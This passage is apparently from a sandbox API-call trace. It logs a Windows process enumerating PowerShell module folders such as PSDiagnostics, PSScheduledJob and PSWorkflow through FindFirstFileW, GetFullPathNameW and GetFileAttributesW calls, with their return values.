	[0047.323] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7860
	[0047.324] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.324] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.324] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.324] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.324] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.324] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.324] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.324] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.324] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.325] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.325] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.325] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.325] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.325] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.325] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.325] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.325] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.325] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.326] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0047.326] FindClose (in: hFindFile=0x1505fab7860 | out: hFindFile=0x1505fab7860) returned 1
	[0047.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.326] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\psdesiredstateconfiguration.psd1")) returned 0x20
	[0047.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.332] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40
	[0047.332] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\", lpFilePart=0x0) returned 0x41
	[0047.332] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8460
	[0047.333] FindNextFileW (in: hFindFile=0x1505fab8460, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.345] FindNextFileW (in: hFindFile=0x1505fab8460, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.345] FindNextFileW (in: hFindFile=0x1505fab8460, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.345] FindNextFileW (in: hFindFile=0x1505fab8460, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.346] FindClose (in: hFindFile=0x1505fab8460 | out: hFindFile=0x1505fab8460) returned 1
	[0047.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.346] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40
	[0047.346] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\", lpFilePart=0x0) returned 0x41
	[0047.347] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7da0
	[0047.347] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.347] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.347] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.348] FindNextFileW (in: hFindFile=0x1505fab7da0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.348] FindClose (in: hFindFile=0x1505fab7da0 | out: hFindFile=0x1505fab7da0) returned 1
	[0047.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.348] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40
	[0047.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.348] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0047.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.348] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40
	[0047.348] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\", lpFilePart=0x0) returned 0x41
	[0047.348] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7b00
	[0047.348] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.349] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.349] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.349] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0047.349] FindClose (in: hFindFile=0x1505fab7b00 | out: hFindFile=0x1505fab7b00) returned 1
	[0047.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.417] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1")) returned 0x20
	[0047.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.421] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41
	[0047.421] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\", lpFilePart=0x0) returned 0x42
	[0047.421] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7860
	[0047.421] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.421] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.421] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.421] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.422] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.422] FindClose (in: hFindFile=0x1505fab7860 | out: hFindFile=0x1505fab7860) returned 1
	[0047.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.422] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41
	[0047.422] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\", lpFilePart=0x0) returned 0x42
	[0047.422] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7620
	[0047.422] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.422] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.423] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.423] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.423] FindNextFileW (in: hFindFile=0x1505fab7620, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.423] FindClose (in: hFindFile=0x1505fab7620 | out: hFindFile=0x1505fab7620) returned 1
	[0047.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.423] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41
	[0047.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.423] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0047.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.423] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41
	[0047.423] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\", lpFilePart=0x0) returned 0x42
	[0047.423] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab8700
	[0047.424] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.424] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.424] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.424] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.424] FindNextFileW (in: hFindFile=0x1505fab8700, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0047.424] FindClose (in: hFindFile=0x1505fab8700 | out: hFindFile=0x1505fab8700) returned 1
	[0047.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.424] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob\\psscheduledjob.psd1")) returned 0x20
	[0047.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.425] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow", lpFilePart=0x0) returned 0x3d
	[0047.425] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\", lpFilePart=0x0) returned 0x3e
	[0047.425] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7860
	[0047.426] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.426] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.426] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.427] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.427] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.427] FindClose (in: hFindFile=0x1505fab7860 | out: hFindFile=0x1505fab7860) returned 1
	[0047.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.427] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow", lpFilePart=0x0) returned 0x3d
	[0047.427] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\", lpFilePart=0x0) returned 0x3e
	[0047.427] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8640
	[0047.427] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.428] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.428] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.428] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.428] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.428] FindClose (in: hFindFile=0x1505fab8640 | out: hFindFile=0x1505fab8640) returned 1
	[0047.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.428] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow", lpFilePart=0x0) returned 0x3d
	[0047.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0047.428] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflow"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0047.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0047.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0047.428] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow", lpFilePart=0x0) returned 0x3d
	[0047.428] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\", lpFilePart=0x0) returned 0x3e
	[0047.428] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7bc0
	[0047.429] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.429] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.429] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.429] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0047.429] FindNextFileW (in: hFindFile=0x1505fab7bc0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0047.429] FindClose (in: hFindFile=0x1505fab7bc0 | out: hFindFile=0x1505fab7bc0) returned 1
	[0047.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0047.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0047.429] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflow\\psworkflow.psd1")) returned 0x20
	[0047.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.430] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility", lpFilePart=0x0) returned 0x44
	[0047.430] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\", lpFilePart=0x0) returned 0x45
	[0047.430] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7b00
	[0047.430] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.430] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.430] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.430] FindNextFileW (in: hFindFile=0x1505fab7b00, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0047.430] FindClose (in: hFindFile=0x1505fab7b00 | out: hFindFile=0x1505fab7b00) returned 1
	[0047.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0047.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0047.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0047.431] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility", lpFilePart=0x0) returned 0x44
	[0047.431] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\", lpFilePart=0x0) returned 0x45
	[0047.431] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\PSWorkflowUtility\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7380
	[0047.431] FindNextFileW (in: hFindFile=0x1505fab7380, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0047.431] FindNextFileW (in: hFindFile=0x1505fab7380, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
